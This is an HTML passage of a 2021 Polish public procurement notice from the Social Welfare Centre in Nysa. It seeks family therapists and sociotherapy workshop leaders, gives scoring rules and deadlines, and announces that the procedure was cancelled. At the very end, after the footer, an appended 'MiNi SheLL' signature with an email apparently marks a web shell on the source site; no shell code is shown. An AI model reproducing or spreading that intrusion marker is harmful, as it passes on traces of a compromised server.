pedagoga rodzinnego/terapeutę rodzin zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania<br/><br/>a)	Doświadczenie osób ubiegających się o świadczenie usług pedagoga rodzinnego/terapeutę rodzin w kryterium oceny ofert weryfikowane będzie na podstawie informacji zawartych <br/>w formularzu oferty (załącznik nr 1 do SWZ) odpowiednio do części.<br/>b)	W kryterium doświadczenie osób ubiegających się o świadczenie usług pedagoga rodzinnego/terapeutę rodzin punktowane będzie minimum 3 letnie doświadczenie w pracy <br/>c)	o charakterze psychologa/psychoterapeuty w okresie ostatnich 5 latach przed dniem wszczęcia postępowania. <br/>d)	Wykazanie mniejszego doświadczenia niż 3 lata i mniej dla danej osoby oznacza 0 pkt.<br/>e)	Maksymalną ilość punktów w tym kryterium otrzyma Wykonawca, który wykaże, największą łączną ilość lat doświadczenia dla jednej osoby w pracy o charakterze pedagoga rodzinnego/terapeutę rodzin lub (średnia arytmetyczna) osób z minimum 3 letnim doświadczeniem w pracy w o charakterze pedagoga rodzinnego/terapeutę rodzin.<br/>f)	Do obliczenia punktacji zostanie obliczona średnia arytmetyczna doświadczenia osób wskazanych w wykazie osób w ofercie. <br/>g)	W przypadku gdy chociaż w jednej ofercie, doświadczenie wykazanej osoby/osób zostanie podane w miesiącach doświadczenie wszystkich osób (specjalistów) w pozostałych ofertach również zostanie przeliczone na miesiące. 1 rok=12 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4: Realizacja warsztatów socjoterapeutycznych<br/>Nazwa zamówienia: Wybór specjalistów w ramach zadania 7 i 8 projektu pt. „Bliżej rodziny i dziecka - wsparcie rodzin przeżywających problemy opiekuńczo – wychowawcze oraz wsparcie pieczy zastępczej – III edycja” Regionalnego Programu Operacyjnego Województwa Opolskiego 2014 – 2020 (RPO WO), Osi priorytetowej VIII Integracja społeczna dla Działania 8.1 Dostęp do wysokiej jakości usług zdrowotnych i społecznych w zakresie wspierania rodziny i pieczy zastępczej. Zadania w w/w projekcie realizowane na warsztatach socjoterapeutycznych:<br/>1.	Wspomaganie dzieci w rozwoju i przyjmowaniu, rozumieniu rzeczywistości przez realizację celów rozwojowych, edukacyjnych i terapeutycznych.<br/>2.	Przygotowanie zapotrzebowania do realizacji warsztatów (materiały, pomoce dydaktyczne – zgłoszenie zamawiający).<br/>3.	Planowanie tematyki warsztatów (do akceptacji przez koordynatora projektu).<br/>4.	Dokumentowanie ww. działań zgodnie z wymaganiami zamawiającego<br/>5.	Współpraca z koordynatorem projektu.<br/>6.	Współpraca z innymi specjalistami realizującymi projekt pn. „Bliżej rodziny i dziecka – wsparcie rodzin przeżywających problemy opiekuńczo-wychowawcze oraz wsparcie pieczy zastępczej – III edycja” oraz z pracownikami Ośrodka Pomocy Społecznej w Nysie. Czas trwania: 12 godzin siedmiomiesięczne/ przez okres 24 miesięcy, łącznie 393 godzin<br/>Realizacja warsztatów odbywać się będzie przynajmniej raz w tygodniu. <br/>Miejsce świadczenia usługi: Klub Rodzica w Gminnym Centrum Wsparcia III Sektora ul. Kornela Ujejskiego 25, 48-300 Nysa i/lub mobilnie w miejscu zamieszkania uczestnika i/lub on-line. Usługa świadczona będzie w godzinach pracy Klubu Rodzica tj. od 7:00 do 19:00 z wyłączeniem dni wolnych od pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena” ocena zostanie dokonana przy zastosowaniu wzoru:<br/><br/> Najniższa cena brutto <br/>spośród złożonych ofert<br/>Ilość punktów = ¬ x 60 pkt.<br/>Cena badanej oferty brutto <br/>Dla części nr 4<br/>	Doświadczenie w prowadzeniu warsztatów socjoterapii/warsztatów terapii zajęciowej zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania w badanej ofercie<br/>Liczba punktów = --------------------------------------------------------------------- x 40 pkt.<br/>	Największe wykazane doświadczenie w prowadzeniu warsztatów socjoterapii/warsztatów terapii zajęciowej zdobyte w okresie ostatnich 5 latach przed dniem wszczęcia postępowania<br/><br/>a)	Doświadczenie osób ubiegających się o realizację warsztatów socjoterapeutycznych <br/>w kryterium oceny ofert weryfikowane będzie na podstawie informacji zawartych <br/>w formularzu oferty (załącznik nr 1 do SWZ) odpowiednio do części.<br/>b)	W kryterium doświadczenie osób ubiegających się o realizację warsztatów socjoterapeutycznych punktowane będzie minimum 5 letnie doświadczenie w prowadzenia warsztatów socjoterapii/warsztatów terapii zajęciowej w okresie ostatnich 5 latach przed dniem wszczęcia postępowania. <br/>c)	Wykazanie mniejszego doświadczenia niż 5 lat i mniej dla danej osoby oznacza 0 pkt.<br/>d)	Maksymalną ilość punktów w tym kryterium otrzyma Wykonawca, który wykaże, największą łączną ilość lat doświadczenia dla jednej osoby w prowadzeniu warsztatów socjoterapii/warsztatów terapii zajęciowej lub (średnia arytmetyczna) osób z minimum 5 letnim doświadczeniem w pracy w o charakterze pedagoga rodzinnego/terapeutę rodzin. <br/>e)	Do obliczenia punktacji zostanie obliczona średnia arytmetyczna doświadczenia osób wskazanych w wykazie osób w ofercie. <br/>f)	W przypadku gdy chociaż w jednej ofercie, doświadczenie wykazanej osoby/osób zostanie podane w miesiącach doświadczenie wszystkich osób (specjalistów) w pozostałych ofertach również zostanie przeliczone na miesiące. 1 rok=12 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z dokumentami potwierdzającymi ich kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia publicznego, a także z zakresu wykonywanych przez nich czynności oraz informacje o podstawie do dysponowania tymi osobami (wzór w zał. nr 5 do SWZ). Wykaz Usług wykonanych przez Wykonawcę w okresie ostatnich 5 latach przed dniem wszczęcia postępowania z załączeniem dowodów określających czy usługi te zostały prawidłowo wykonane i prawidłowo ukończone, przy czy dowodami , o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi związane z ww. zamówieniem były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty (wzór w zał. nr 6 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy PZP (w zał. nr 2 do SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego (wzór w zał. nr 4 do SWZ), oświadczenie wykonawcy, w zakresie art. 108 ust.1 pkt. 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (tekst jedn. Dz.U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (zał. nr 7 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 2 do SWZ.<br/>Informacje zawarte w oświadczeniu, o którym mowa w pkt 6.1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (wzór zobowiązania stanowi załącznik nr 3 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; do oferty należy dołączyć oryginał pełnomocnictwo które musi <br/>być w formie lub postaci elektronicznej.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; do oferty należy dołączyć oryginał pełnomocnictwo które musi <br/>być w formie lub postaci elektronicznej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem miniPortalu, do dnia 20.07.2021r. ,godz. 12.00. 9.2.	Wykonawca może złożyć tylko jedną ofertę. 9.3.	Treść oferty musi być zgodna z wymaganiami zamawiającego określonymi w dokumentach zamówienia. 9.4.	Oferta może być złożona tylko do upływu terminu składania ofert. 9.5.	Do upływu terminu składania ofert wykonawca może wycofać ofertę.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-20 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zawiadomienie o unieważnieniu postępowania<br/>na podstawie art. 255 ust. 5 ustawy Prawo Zamówień Publicznych z dnia <br/>11 września 2019r.<br/><br/>Zamawiający w postępowaniu, którego przedmiotem jest wybór specjalistów w ramach zadania 7 i 8 projektu pt. „Bliżej rodziny i dziecka wsparcie rodzin przeżywających problemy opiekuńczo – wychowawcze oraz wsparcie pieczy zastępczej – III edycja” Regionalnego Programu Operacyjnego Województwa Opolskiego 2014 – 2020 (RPO WO), Osi priorytetowej VIII Integracja społeczna dla Działania 8.1 Dostęp do wysokiej jakości usług zdrowotnych<br/> i społecznych w zakresie wspierania rodziny i pieczy zastępczej, współfinansowanego <br/>z Europejskiego Funduszu Społecznego, niniejszym pismem informuje o unieważnieniu postępowania. <br/><br/>Uzasadnienie prawne:<br/>Zgodnie z treścią art. 255 ust. 5 ustawy Pzp wystąpiła istotna zmiana okoliczności powodująca, że prowadzenie postępowania lub wykonanie zamówienia nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć.<br/><br/>Uzasadnienie faktyczne:<br/>Decyzja o unieważnieniu postępowania została podjęta w wyniku stwierdzenia czasowego braku płynności finansowej przewidzianej na realizacje tego zadania - sytuacja niezależna od Ośrodka Pomocy Społecznej w Nysie ( wycofanie się jednego z Partnerów Projektu).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com